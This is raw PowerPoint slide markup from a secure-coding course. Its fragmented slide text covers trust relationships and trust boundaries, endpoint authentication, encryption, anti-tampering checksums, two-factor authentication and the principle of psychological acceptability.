              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="7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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Relationships</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5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10298287" cy="4261645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issues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establishing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trust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are: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ut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ating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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-1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prevent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masquerading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Ensuring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communication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itself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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-1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maintain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 confidentiality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 the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tin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tam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erin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 da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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-1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maintain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integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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data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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="84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Once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data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enters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Boundary,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must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certain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its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veracity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as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your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application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requires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9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acceptable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come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from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anonymous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user?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Must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pri</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-40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ate?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Must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cu</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5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ate?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106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4707747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50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="7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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Relationships</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5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32268"/>
            <a:ext cx="10288765" cy="3654743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588468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Example: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need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exchange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information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between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web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client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server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1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Authentication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likely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session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token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created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when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client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logs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communication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performed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SSL/TLS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SSH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Anti-tampering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done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adding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checksums</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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messages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None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these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completely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 desktop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itself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870324" marR="583390" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2159"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Proxies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sniffing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tools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will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allow an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attacker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access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to the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data between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1999" spc="-6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client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network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35"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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3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attacker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could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legitimate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client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user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lnSpc>
                <a:spcPts val="2279"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="155"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-2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Remember,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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limits</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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to how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make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communication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through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870324" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2279"/>
              </a:lnSpc>
            </a:pP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untrustworthy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network,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but you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do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 quite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a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bit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107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4707747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50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="7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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Relationships</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5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699" y="1332267"/>
            <a:ext cx="10347805" cy="3709974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664011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Example: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needs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to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send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sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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third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party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processing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and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then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returned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155528" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40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Assuming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 have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done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everything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possible to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guarantee the trustworthiness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third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party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9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must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authenticate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sending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correct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endpoint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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="7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7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shared</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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secret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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Public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Key</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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Certificates</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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issues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trusted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Certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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Authority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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="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Kerberos,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NTLM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 integrated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authentication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communication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performed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using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SSH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certificates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Anti-tampering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again be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used,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possibly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over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entire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file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send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unit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108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4707747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50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="7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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Relationships</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5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32268"/>
            <a:ext cx="10241787" cy="4308623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60942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Example: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must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accept</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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data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from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only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supports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80" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>FTP,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not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any secure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protocols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1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terribly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sensitive,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would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allowed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40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primary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concern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protecting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from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contamination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Unless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standards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low,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don't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allow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inside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45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Boundary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lnSpc>
                <a:spcPts val="2279"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="160"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Collect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external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server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(possibly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in a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DMZ)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process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input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870324" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2279"/>
              </a:lnSpc>
            </a:pP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correctness</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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before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importing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870324" marR="691942" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2159"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Authentication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may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be as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little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as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FTP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account and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password which is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not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-6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terribly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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0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possible,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require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form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anti-tampering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172668" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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Authentication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may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 as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little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FTP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account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 password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which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not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terribly secure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14"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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3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IP Address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form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of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identification,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but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it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spoofed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109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4707747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50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="7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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Relationships</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5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0"/>
            <a:ext cx="9330799" cy="2416181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Example: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allow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remote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3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management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Authentication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critically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important;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consider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two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factor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authentication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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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SMS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codes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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Using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hardware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authenticators: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disconnected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connected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tokens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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Biometrics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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="4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40" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Use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combination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what the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user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knows,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has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inherits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ommunicati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tunn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ou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SH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Testing</a:t>
            </a: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1293813" y="1676399"/>
            <a:ext cx="10149250" cy="4906497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3838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6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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2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600" dirty="0"/>
              <a:t>Input validation of form information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2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600" dirty="0"/>
              <a:t>XSS, SQL injection, and buffer overflow attacks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2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600" dirty="0"/>
              <a:t>Others identified by the vulnerability scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1097280" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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568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110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775759" y="216482"/>
            <a:ext cx="8638830" cy="7072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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2614"/>
              </a:lnSpc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 Coding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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2849"/>
              </a:lnSpc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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Trust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Relationships</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="7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- Security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267122"/>
            <a:ext cx="10270990" cy="4037548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Alias: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None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Nothing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outside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trusted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trustworthy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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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Even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other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endpoint,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can't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communication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system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 other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parties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9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can't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know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other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endpoint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truly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4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ou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nne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ou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sid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world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Consequences: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Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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integrity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maintained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external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communications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1159162" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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application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protected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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from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attacks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originating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outside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0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-67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Boundary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111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 Coding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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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Relationships</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="7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-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499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Tips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10257023" cy="3964542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Authentication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tw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o-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au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nti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ati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whe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q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ui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Encrypt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all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client-side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session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data;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cookies,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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session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tokens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Encrypt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all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authentication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credentials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in-transit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Do not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leave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authentication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information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client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memory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unless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encrypted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put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hard-coded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passwords,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encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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keys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vital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information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client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host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1894271" indent="-185364" algn="r" defTabSz="914126"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Communications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must be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encrypted to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defend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confidentiality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R="1823173" algn="r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HTTPS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SSL/TLS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endpoint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authentication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encryption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Con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igu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SL/TL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x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clu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wea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cry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99" spc="-4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SSH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create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encrypted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tunnel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non-HTTP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traffic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112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 Coding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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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Relationships</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="7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-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499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Tips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312640"/>
            <a:ext cx="10256388" cy="1794043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Anti-tampering</a:t>
            </a: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methods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include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Hardware-based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devices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encrypt/decrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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message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stream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Encryption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wrapping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tunnels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all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data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through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encryption/decryption</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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process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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999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-425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serious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performance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limitations</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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web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clients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Add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tamper-detection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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checksums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each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message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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2662754"/>
            <a:ext cx="4082622" cy="2906908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2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Implementation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2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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-5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249" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Acceptability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Least</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Mechanism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0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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Validate</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-8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Inputs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Prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attacks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0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249" spc="-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249" spc="-6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at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Rest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Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="224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249" spc="-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spc="-25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Verify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20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Defend</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2249" spc="-7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24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Depth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114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 Coding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Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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Acceptability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="8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-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Introduction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332268"/>
            <a:ext cx="10327490" cy="2264455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5078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Principle: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mechanisms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make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the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resource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more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difficult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3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than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if the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mechanism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were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present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1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Corollary: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many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cases,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will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only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get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close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approximation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user-friendliness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are often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contradictory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422782" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="84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mechanisms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seek</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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 as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unobtrusive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possible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while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still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meeting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goals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115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209882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35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0" dirty="0"/>
              <a:t>Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Acceptability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>- Example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32268"/>
            <a:ext cx="10331934" cy="3765204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1103934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If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 configuration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securing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security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mechanism is difficult or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confusing,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users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may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choose to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not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enable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1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od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201235" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="42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Example,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product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five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different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settings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cookie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expiration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times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interact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lnSpc>
                <a:spcPts val="2279"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Complicated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because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development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team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didn't</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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want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change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outdated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870324" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2279"/>
              </a:lnSpc>
            </a:pP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method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charging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for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usage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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Eventually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became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fixed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at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deployment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locked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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="84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When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cookies are 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turned-off,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 application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resorts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 session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ids passed in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URL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1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Just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eq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kie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 be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116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209882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35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0" dirty="0"/>
              <a:t>Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Acceptability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>- Example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10094506" cy="3642680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company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mandates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two-factor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login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google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mail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having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get an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authentication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code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from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cell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phone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when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login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psychologically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acceptable?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only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so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every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30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days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any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given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host?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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="83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 college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campus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decides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usernames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 less</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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"guessable"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replaces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them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8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random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characters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0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ch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logi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ly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pta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le?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318040" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="84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system requires that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all personal files be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passworded, so each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access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requires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password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typed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0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ch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logi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ly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pta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le?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117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775759" y="216482"/>
            <a:ext cx="8638830" cy="7072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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2614"/>
              </a:lnSpc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 Coding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778" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2849"/>
              </a:lnSpc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Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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Acceptability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="7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-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="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Security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="4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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267123"/>
            <a:ext cx="9587273" cy="3381764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Alias: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None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uri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going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ed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enie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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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mechanisms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unusually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complex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difficult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will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evaded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create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complaints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9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uri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isms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oft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 disabl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Consequences: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95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ll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-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design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mecha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uri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 used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118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818664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0" dirty="0"/>
              <a:t>Psychological</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Acceptability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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267122"/>
            <a:ext cx="9798673" cy="2296832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Avoid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situations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where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code is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shared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between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different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privilege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levels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particularly true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where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3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control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resources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required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Fil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ystems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Datab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Und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rlyin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4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ating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sy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tems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mmuni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ati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systems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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
